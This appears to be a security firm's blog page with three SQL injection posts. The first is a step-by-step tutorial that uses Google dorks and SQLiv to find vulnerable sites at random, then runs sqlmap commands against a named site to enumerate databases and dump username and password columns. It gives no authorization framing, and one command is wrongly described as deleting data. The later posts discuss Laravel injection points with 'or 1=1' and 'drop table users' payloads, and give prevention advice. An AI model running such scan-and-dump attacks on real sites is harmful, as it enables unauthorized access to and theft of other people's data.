Airzero Sec

We Do Not Give Up ! Trust US !

enter image description here

The individuals that use databases for various data storage management greatly increase in web app development as time moves on. The database facilitates communication between users and servers. The database gives different benefits including data input and where it is kept, retrieval of large information and the ease of grouping information.

This is both exciting and worrying because in a database there are a lot of important details like credential accounts, financial details and so on. Also, to do SQL injection attacks does not always need an expert injecting capability, in the sense, even kids can do it. Because there are many applications that are useful to perform SQL injection automatically, such as SQLMap. SQLMap is an application for penetration testing activities that aims to conduct SQL injection attacks in database security automatically. Here in this blog, we will show you how to do SQL injection using SQLMap. No special requirements are needed but will be worth more if you master a scripting language. This blog is suggested for those who are new to SQL injection, or who want to see how SQL injection works.

What Is SQL Injection?

SQL injection is specially referred to as SQLi, maybe it’s a most common attack method that uses inappropriate code for back-end database changes to access details that weren't intended to be displayed and are highly mentioned to be highly secret.

How does SQL injection work?

To run a SQL injection, an attacker must locate a weak input in a web application or webpage. When an application or web page includes an SQL injection vulnerability, it uses user input in the form of an SQL query. The attacker can execute a specifically build SQL command as a malicious cyber threat. Then, leveraging this code the attacker can acquire a response that provides a clear direction about the database construction and thereby access to all the information in the database.

How do we do SQL injection using SQLmap in Kali Linux?

  • The first step is to install sqliv on Kali Linux
  • The next step is finding SQL injection vulnerabilities
  • The last and final step is SQL injection using SQL map

How to install sqlive on Kali Linux?

Type following command into your terminal to install SQLiv:

~# git clone https://github.com/Hadesy2k/sqliv.git
~# cd sqliv && sudo python2 setup.py -i

After SQLiv is installed in your Kali Linux, it is kept in the path /usr/bin/sqliv. Which, you can call from the terminal, by typing ‘sqliv’.

How do we find SQL injection vulnerabilities?

We will always use Google Dorking to scan and identify the SQL injection in targets. Let’s take a simple dork, and let SQLiv scan through each target and look for an eCommerce vulnerability at the following URL pattern ‘item.php?id=’. To find other patterns just google for “google dork list”.

~# sqliv -d inurl:item.php?id= -e google -p 100

By default, SQLiv will crawl the f page on a search, which on google sites per page. Thus, here we define argument -p 100 to crawl through 100 sites.

How do we do SQL injection using SQLmap?

Once we got at least one SQL injection vulnerable point, next we run the attack using SQLMap. Firstly, we are required to reveal the database name, the database has tables and columns, Those that contain the data. Steps to follow:

  • The first step is to enumerate the database names
  • The next step is to enumerate the table’s name
  • The third step is to enumerate columns
  • Last step is to dump data

How to enumerate the database names:

Command pattern:

~# sqlmap -u “TARGET URL” --dbs
-u / --url : Target URL
--dbs : Enumerate Database/s name

So, for example, the command would look like this:

`~# sqlmap -u “http://www.acfurniture.com/item.php?id=25” --dbs`

How to enumerate tables name:

Command pattern:

~# sqlmap -u “TARGET URL” -D database-name --tables

So, For example, the command compiled be like this:

~# sqlmap -u " the link that you try to inject" -D acfurniture --tables

How to enumerate column names:

Command pattern:

~# sqlmap -u “TARGET URL” -D database-name -T table-name --columns

So, for example, the command compiled be like this:

~# sqlmap -u "http://www.acfurniture.com/item.php?id=25" -D acfurniture -T settings--columns

How do we dump data?

Command pattern:

~# sqlmap -u “TARGET URL” -D database-name -T table-name -C columns --dump

So, for example, the command compiled be like this:

~# sqlmap -u "http://www.acfurniture.com/item.php?id=25" -D acfurniture -T settings -C username,password --dump

Or you can also delete all data inside the table, By using the command that gives us an example instead of the given url you should choose the url that you want to do SQL injection:

~# sqlmap -u "http://www.acfurniture.com/item.php?id=25" -D acfurniture -T settings --dump

If you have any queries about the above topic or have to get services and consultations against this serious cyber threat. Feel free to contact us. AIRZERO SEC will be your strong cyber partner.

E-mail id: [email protected]

enter image description here

Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

enter image description here

What Is SQL Injection?

SQL Injection is a type of cyber attack that makes it possible to execute criminal SQL statements. These statements control the database server behind any web application. Hackers can use SQL Injection vulnerabilities to destroy application security measures. They can go around authentication of a web page and retrieve the content of the whole SQL database. They can also use SQL Injection to add, delete and modify records in the database. The best cyber security company that you approach will always provide the best to protect your database from SQL injection and attacks.

An SQL Injection vulnerability may affect any website that uses an SQL database such as MySQL, Oracle, or others. Criminals may use it to gain unauthorized access to your personal and highly important data like:

  • Customer information
  • Personal data
  • Trade secrets
  • Intellectual property and more

SQL Injection attacks are one of the oldest and very dangerous web application vulnerabilities. Cyber security service providers will help you with this serious problem.

Why Laravel Framework?

Laravel is a web app development framework with expressive and royal syntax that makes the entire web development process faster, simple, and more enjoyable for developers by eliminating all the pain points associated with handling the most complex PHP code.

It simplifies some of the mostly executed tasks like routing, authentication, sessions, caching, and others so that developers can focus on building most business-related features of the web application. Laravel protects the web apps from SQL injection as long as you're using the fluent query builder.

Laravel does this by making secured and prepared statements that are going to escape any user input that may come in through the apps. If attackers add a new input to a form, they may try to insert a query and then run their own SQL query to damage your application database. However, this won't work while you are using Eloquent. Eloquent is going to protect from this SQL query and the invalid query will just be saved as text into your database.

What Are The Types Of SQL Injection Attack Vectors That Laravel Can’t Protect?

Developers usually make mistakes by thinking Laravel protects from all SQL injections and attacks, while there are some attack points that Laravel cannot protect, here are the most common causes of SQL injections that we saw in the latest Laravel applications during our security Checks.

SQL Injection via column name

The first common mistake that we see is that a lot of people think that Laravel would escape any dimension that is passed to Query Builder or Eloquent. But in reality, it’s not that safe to pass user-controlled column names to the query builder.

It’s important to mention that the demonstrated attack point is fixed on the Laravel versions, but still, Laravel warns developers even in the new documentation to not pass user-controlled column names to Query Builder without whitelisting.

Commonly, even if there is no chance to turn a custom column into an injected SQL string, we still do not recommend allowing to sort the data by any user-provided column name, since it can introduce a dangerous security issue.

SQL Injection via validation rules

Let’s take a look at the following simplified validation code:

$id = $request->route('id');
$rules = [ 'username' => 'required|unique:users,name,' . $id,];

$validator = Validator::make($request->post(), $rules);

Whether Laravel uses $id here to command that database and $id is not escaped, it will allow a hacker to perform an SQL injection.

How to prevent SQL injection in Laravel?

Laravel’s Eloquent ORM uses PDO binding that protects web apps from SQL injections. This relevant feature ensures that no client could modify the intent of the SQL queries.

Consider the example of the form used to collect users’ email addresses from a database. the form will search for an email address, for instance, “[email protected]”. Now imagine that the SQL query is modified to:

SELECT * FROM users WHERE email = '[email protected]' or 1=1

In the above example, 1=1 is a simple expression that always evaluates to be true. If it is attached to the above query with the OR condition, the query will fetch all records from the table because the SELECT condition will evolve to be always true.

Now consider another direction of the attack in which the query is modified directly to the command “drop table users” and instead of the email address, “[email protected]” is written. The query will look like this:

SELECT * FROM users WHERE email = '[email protected]'; drop table users;

When this query is executed, the table “users” will be deleted from the database.

When the PDO parameter binding is in place, the input is in quotes and the query will look like this:

SELECT * FROM users WHERE email = '[email protected] or 1=1'

Since no records will match with either the email or the “1=1”, the query will not be returning anything.

This framework provides other ways of talking to databases, such as raw SQL queries. Yet, Eloquent remains one of the most popular options.

Laravel framework uses PDO binding to prevent SQL injection attacks because no variable gets to the database without validation.

If this is the case, one should always use prepared SQL queries to prevent misplacement. Consider the following statement that looks ripe for SQL injection:

Route::get('this-is-prone-to-sql-injection', function() {
$name = "'ancy' OR 1=1";
return DB::select(
DB::raw("SELECT * FROM users WHERE name = $name"));});

Here the statement 1=1 used in the OR condition will result in returning all the rows in the user’s table. This can be prevented by using the following code instead:

Route::get('safe-from-sql-injection', function() {
$name = "'ancy' OR 1=1";
return DB::select(
DB::raw("SELECT * FROM users WHERE name = ?", [$name]));});

Laravel replaces the question marks with the query, automatically escaping the input variables. This protects the query from SQL injection attacks.

If you have any queries about this topic or have to get services and consultations against this serious cyber threat. Feel free to contact us. AIRZERO SEC will be your strong firewall.
E-mail id: [email protected]

enter image description here Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/
Email id: [email protected]

enter image description here

What is SQL Injection (SQLi)?

SQL injection is additionally referred to as SQLi, maybe a common attack method that uses inappropriate SQL code for back-end database manipulation to access information that wasn't intended to be displayed. This information includes many private and sensitive data. This sort of cybersecurity attack targets the confidential databases within the system to trick into doing unexpected and undesired things. The cybersecurity service company provides the best to protect the attackers to access the below data. It is very important to consult such companies.

Actions that successful attacks may take targets include:

  • Bypass authentication
  • Stealing data
  • Modifying or corrupting data
  • Deleting data
  • Running arbitrary code
  • Gaining root access to the system itself

What is SQL injection vulnerability?

The SQL injection vulnerability is one of the foremost terrific issues for data confidentiality and integrity in web applications and has been one of the foremost common and widely explained vulnerabilities since its inception.

Non-Technical Explanation Of SQL Injection Vulnerability For Understanding:

Imagine a totally automated and secured bus that functions to support the instruction given by the owner through a typical technical form. The instruction seems like this: Drive through the road route 66 and stop at bus stops if there are people at the bus stops. Values in bold are provided by the owner and instructed by the bus. Imagine a scene where someone manages to send these instructions: Drive through route 66 and don't stop at bus stops and ignore the remainder of this type if there are people at the bus stops.

The bus is fully automated. It does exactly what's instructed: it drives up route 66 and doesn't stop at any stop, even when there are people waiting. Such an injection is stable because the structure and therefore the supplied data aren't separated correctly. The automated bus doesn't differentiate between instructions and data, it simply parses anything it's fed.

SQL injection vulnerabilities have supported this idea. Attackers are ready to inject malicious instructions into corrupted ones, all of which are then sent to the database server through an internet application.

Types of SQL injection vulnerabilities

Traducer can exfiltrate data from servers by diminishing SQL Injection vulnerabilities in various ways they are:

  • Error-Based SQL Injection
    When exploiting an error-based SQL Injection vulnerability, attackers can retrieve information like table names and content from visible database errors.
  • Boolean-Based SQL Injection
    Sometimes there's no visible error message on the page when an SQL query fails, making it difficult for a hacker to urge information from the vulnerable application. However, there's still how to extract information.
    When an SQL query fails, sometimes some parts of the online page disappear or change, or the whole website can fail to load. These indications allow attackers to work out whether the input parameter is vulnerable and whether it allows extraction of knowledge.
  • Time-Based SQL Injection
    In some cases, the vulnerable SQL query doesn't have any visible effect on the output of the page, it's still going to be possible to extract information from an underlying database.
    Hackers determine this by instructing the database to present a stated amount of your time before responding. If the page isn't vulnerable, it'll load quickly; if it's vulnerable it'll take longer than usual to load. This permits hackers to extract data, of course, there are not any visible changes on the page. The SQL syntax is often almost like the one utilized in the Boolean-Based SQL Injection Vulnerability.
  • Out-of-Band SQL Injection Vulnerability
    Sometimes the sole way an attacker can retrieve information from a database is to use out-of-band techniques. Usually, these sorts of attacks involve sending the info directly from the database server to a machine that's controlled by the attacker. Attackers may use this method if an injection doesn't occur directly after supplied data is inserted, but at a later point in time.

What Can Attackers do after SQL Injection Attack?

To perform an SQL injection attack, an attacker must locate a vulnerable input during a web application or webpage. When an application or webpage contains a SQL injection vulnerability, it uses user input within the sort of an SQL query directly. The hacker can execute a specifically crafted SQL command as a malicious cyber intrusion. Then, leveraging malicious code, a hacker can acquire a response that gives a transparent idea about the database construction and thereby access to all or any of the knowledge within the database.

SQL is the way of communication to the database. SQL statements are wont to retrieve and update data within the database. Attackers use malicious SQL statements within the input box, and in response, the database presents sensitive information. This exploit of security aims at gaining access to the unauthorized data of an internet site or application. Several websites and web applications store data in SQL databases. For any of those applications, it becomes essential to perform vulnerability testing to make sure there are not any loopholes for executing SQL injection.

What is the impact of a successful SQL injection attack?

With no mitigating controls, SQL injection can leave the appliance at a high risk of compromise leading to an impression of the confidentiality, and integrity of knowledge also as authentication and authorization aspects of the appliance. An adversary can steal sensitive information stored in databases employed by vulnerable programs or applications like user credentials, trade secrets, or transaction records. SQL injection vulnerabilities should never be left open; they need to be fixed altogether under circumstances. If the authentication or authorization aspects of an application have affected an attacker could also be able to log in as the other user, like an administrator which elevates their privileges.

How to prevent SQL Injection Attacks?

Preventing SQL injection attacks is a lot about ensuring that none of the fields are vulnerable to invalid inputs and application execution. it is actually impossible to check every page and every application on the website, especially when updates are frequent and user-friendliness is the top priority.

Nonetheless, security analysts and seasoned developers recommend a variety of next points to guarantee your database area unit is well protected inside the confinement of the server.

  1. Continuous Scanning and Penetration Testing
    The automated web application scanner has been the simplest option to mean vulnerabilities within the online applications for quite a while now. Now, with SQL injections getting smarter in exploiting logical flaws, website security professionals should explore manual testing with the assistance of a security vendor.
    They can authenticate user inputs against a group of rules for syntax, type, and length. It helps to audit application vulnerabilities discreetly so that you can patch the code before hackers exploit it to their advantage.
  2. Restrict Privileges
    It is more of a database management function, but enforcing specific privileges to specific accounts helps prevent blind SQL injection attacks. Begin with no privileges account and advance to ‘read-only’, ‘edit’, ‘delete’, and similar privilege levels.
    Minimizing privileges to the appliance will make sure that the attacker, who gets into the database through the appliance, cannot make unauthorized use of specific data.
  3. Use Query Parameters
    Dynamic queries create a lot of trouble for security professionals. They have to affect variable vulnerabilities in each application, which only gets worse with updates and changes. It is recommended that you prepare parameterized queries.
    These queries are simple, easy to write down, and only pass when each parameter in SQL code is clearly defined. This way, your info is furnished with weapons to differentiate between code and knowledge inputs.
  4. Instant Protection
    A majority of organizations fail with problems like outdated code, scarcity of resources to test and make changes, no knowledge of application security, and frequent updates in the application. For these, web application protection is the best solution.
    A managed web application firewall can be deployed for immediate mitigation of such attacks. It contains custom policies to dam any suspicious input and denies information breach instantly. This way, you do not have to manually look for loopholes and mend problems afterward.

If you have any queries about this topic or have to get services and consultations against these serious cyber threats. Feel free to contact us. Always AIRZERO SEC will be your strong firewall. E-mail id: [email protected]

enter image description here Author :
Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkdIn Profile: www.linkedin.com/in/johnsontaugustine/